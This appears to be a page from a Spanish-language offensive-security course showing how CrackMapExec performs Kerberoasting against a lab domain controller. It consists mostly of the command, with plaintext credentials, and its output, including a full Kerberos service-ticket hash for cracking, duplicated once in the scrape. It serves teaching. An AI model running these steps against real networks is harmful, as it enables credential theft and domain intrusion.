Utilizando CrackMapExec

Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: . ¡Te esperamos para empezar este viaje juntos!

CrackMapExec tiene modulos muy interesantes que pueden ayudarnos durante un proceso de intrusion:

root@kali=> ./cme ldap 18.116.10.36 -u 'clearpass.user' -p 'Password@1' --kerberoast output.txt
SMB         18.116.10.36    445    FIRST-DC         [*] Windows 10.0 Build 17763 x64 (name:FIRST-DC) (domain:spartancybersec.corp) (signing:True) (SMBv1:False)
LDAP        18.116.10.36    389    FIRST-DC         [+] spartancybersec.corp\clearpass.user:Password@1 
LDAP        18.116.10.36    389    FIRST-DC         [*] Total of records returned 1                                                                                                                                          ccache.py:578
LDAP        18.116.10.36    389    FIRST-DC         sAMAccountName: roast.user memberOf:  pwdLastSet: 2023-09-28 21:03:36.264988 lastLogon:<never>
LDAP        18.116.10.36    389    FIRST-DC         $krb5tgs$23$*roast.user$SPARTANCYBERSEC.CORP$spartancybersec.corp/roast.user*$163208e7061ca0c42cd514b9d7973d40$099bf886f8c197e2e3423cdd9bc90299b666d5a56d183c321a567c4a161e980650a97c4edd8dac1a2c860acad7c310e0ce9218fafdd73c5e24297d170c615b13ec34ea0ad47ec68f05431ccce15d66097669b8093b688eb4fbac01d0180db04c996b55e41fd0572f01f7ec1e1871696ba52f6494274611520a85ea78c43a2e4c06e2a1ed00002b3d5b46a0bf8fe7214b271fc7e1f1f9f7f96554cb3b32488d3575ea6c0d66a9ea1cfd361c22c9fdda6e936925a720798aa33b3ec8fb2d5183dcd5328046bd4fd070f914b6a12efd324f120a6c8ef06d41d46f710bb67ce02da15f018580569a2dbc280a913d6b71462e9665e153e8c1a6a76b71661183b5f9f2a908c3d0adf966b14dad7b71521296cdbffa2c16600cea38ff984340702d5c2dc493d7ae6333cabe5570767ee83e616d91697a5d5f4ab6f9a74e9b1be25f350d8c608637ac422fdb60917eefa016567d3fe8178b783ba5d20b08812275757cf8beea65a1b0855c7ce4e6e04ca16a57be93e14f81c670a23ff22059445631dbcb92be35565efa265f2e4b763d7c2ba62d6897b4fc8016b464ab8d392f7e2cb7ae65ca60d7d6608816b10e0e0316dd4e3861dfdc9099928d1b5f86c8df9da51edb9a8224e02cfb096b212f37eb364b2dba635e8dfcc7f780bde482868adaf03b2892c045a80a18d70fbd5d9ee4b74cf1450aef8cd380e1fb97fa07254e42fff97a1ee7e11d33c50cdb43b6db398d60f3c526c15ccc4edfaaf0249c83d1b730b07b843f28d8d2d679f1acaaac488b63e6b3f171fe6c3d95b711744c1d996e46bb9349c1485d59a8006fb1c46b6b263d8d679ae16cbebdd77eff29a4f22b2269d17e0115160a146068ac83b54d670fdc0d3aaa6b1d1b781124b037394b894f06f79f34b4469e3d6610bf86f4eb20db991e6538e699340cbb4c3c92eb8d10797833ead29974824cce8838a775389547b949f5199550d464cfcacc5fc7538b2f6680ba2dd3dac37a63a434838be232077bb9bfaa4ffddc0360f8c8d8c3b65d8e88d8b04a9af5201de4598caccdb74b78b1ab94368ba8654a8429f14ef8984ed80075c5bcbd9dea4502c7b05746ff8ca6c59cb120e6c07e8abde49b9bdd57b40545408aac552a4a506f551149fda309cca5b5cef38f9b345df3db9cdd9f09e639c4cc14be75db5df0825d9143621fa3cc56b4b519935131db1556fe657527c25bbaea9fc8f907a0c5078531f3adff9affc7e8bb1e340e574666ce26a78f2b04280dbf46a4a8d68e986d25a7a531bd0b5688382a6c162562fdaa21dbc9c3d44a478b049f88d7446eedd674a04193600aaea5ca8b0acd86109d6c2d74d1400cb6edc826135ac6742c344246673f34f54f20602667524fb75146c2228d2bdd8f35fd4b78ba3d86fc2676141a07e0da76addd0c88892769cbd43c8ab502e10e863adb4e2e78b5caa4bc3702bece340393ae8c0aa2828165805809e0bb2b10356d4386e044d1fa4cfbd303b12f22c66b6ea626d50ff9bbd371d8721de5671be7925bf735c0966011fd210133f1f08e8744c4e7b7323f3ab0a74bbf4d15ad5eeccb8e76d2b48d3f0304

root@kali=> tail -1 /etc/hosts
18.116.10.36    first-dc.spartancybersec.corp spartancybersec.corp

AnteriorUtilizando Impacket-GetUserSPNs SiguienteUtilizando PowerView

Última actualización hace 9 meses

¿Te fue útil?

root@kali=> ./cme ldap 18.116.10.36 -u 'clearpass.user' -p 'Password@1' --kerberoast output.txt SMB 18.116.10.36 445 FIRST-DC [*] Windows 10.0 Build 17763 x64 (name:FIRST-DC) (domain:spartancybersec.corp) (signing:True) (SMBv1:False) LDAP 18.116.10.36 389 FIRST-DC [+] spartancybersec.corp\clearpass.user:Password@1 LDAP 18.116.10.36 389 FIRST-DC [*] Total of records returned 1 ccache.py:578 LDAP 18.116.10.36 389 FIRST-DC sAMAccountName: roast.user memberOf: pwdLastSet: 2023-09-28 21:03:36.264988 lastLogon:<never> LDAP 18.116.10.36 389 FIRST-DC $krb5tgs$23$*roast.user$SPARTANCYBERSEC.CORP$spartancybersec.corp/roast.user*$163208e7061ca0c42cd514b9d7973d40$099bf886f8c197e2e3423cdd9bc90299b666d5a56d183c321a567c4a161e980650a97c4edd8dac1a2c860acad7c310e0ce9218fafdd73c5e24297d170c615b13ec34ea0ad47ec68f05431ccce15d66097669b8093b688eb4fbac01d0180db04c996b55e41fd0572f01f7ec1e1871696ba52f6494274611520a85ea78c43a2e4c06e2a1ed00002b3d5b46a0bf8fe7214b271fc7e1f1f9f7f96554cb3b32488d3575ea6c0d66a9ea1cfd361c22c9fdda6e936925a720798aa33b3ec8fb2d5183dcd5328046bd4fd070f914b6a12efd324f120a6c8ef06d41d46f710bb67ce02da15f018580569a2dbc280a913d6b71462e9665e153e8c1a6a76b71661183b5f9f2a908c3d0adf966b14dad7b71521296cdbffa2c16600cea38ff984340702d5c2dc493d7ae6333cabe5570767ee83e616d91697a5d5f4ab6f9a74e9b1be25f350d8c608637ac422fdb60917eefa016567d3fe8178b783ba5d20b08812275757cf8beea65a1b0855c7ce4e6e04ca16a57be93e14f81c670a23ff22059445631dbcb92be35565efa265f2e4b763d7c2ba62d6897b4fc8016b464ab8d392f7e2cb7ae65ca60d7d6608816b10e0e0316dd4e3861dfdc9099928d1b5f86c8df9da51edb9a8224e02cfb096b212f37eb364b2dba635e8dfcc7f780bde482868adaf03b2892c045a80a18d70fbd5d9ee4b74cf1450aef8cd380e1fb97fa07254e42fff97a1ee7e11d33c50cdb43b6db398d60f3c526c15ccc4edfaaf0249c83d1b730b07b843f28d8d2d679f1acaaac488b63e6b3f171fe6c3d95b711744c1d996e46bb9349c1485d59a8006fb1c46b6b263d8d679ae16cbebdd77eff29a4f22b2269d17e0115160a146068ac83b54d670fdc0d3aaa6b1d1b781124b037394b894f06f79f34b4469e3d6610bf86f4eb20db991e6538e699340cbb4c3c92eb8d10797833ead29974824cce8838a775389547b949f5199550d464cfcacc5fc7538b2f6680ba2dd3dac37a63a434838be232077bb9bfaa4ffddc0360f8c8d8c3b65d8e88d8b04a9af5201de4598caccdb74b78b1ab94368ba8654a8429f14ef8984ed80075c5bcbd9dea4502c7b05746ff8ca6c59cb120e6c07e8abde49b9bdd57b40545408aac552a4a506f551149fda309cca5b5cef38f9b345df3db9cdd9f09e639c4cc14be75db5df0825d9143621fa3cc56b4b519935131db1556fe657527c25bbaea9fc8f907a0c5078531f3adff9affc7e8bb1e340e574666ce26a78f2b04280dbf46a4a8d68e986d25a7a531bd0b5688382a6c162562fdaa21dbc9c3d44a478b049f88d7446eedd674a04193600aaea5ca8b0acd86109d6c2d74d1400cb6edc826135ac6742c344246673f34f54f20602667524fb75146c2228d2bdd8f35fd4b78ba3d86fc2676141a07e0da76addd0c88892769cbd43c8ab502e10e863adb4e2e78b5caa4bc3702bece340393ae8c0aa2828165805809e0bb2b10356d4386e044d1fa4cfbd303b12f22c66b6ea626d50ff9bbd371d8721de5671be7925bf735c0966011fd210133f1f08e8744c4e7b7323f3ab0a74bbf4d15ad5eeccb8e76d2b48d3f0304 root@kali=> tail -1 /etc/hosts 18.116.10.36 first-dc.spartancybersec.corp spartancybersec.corp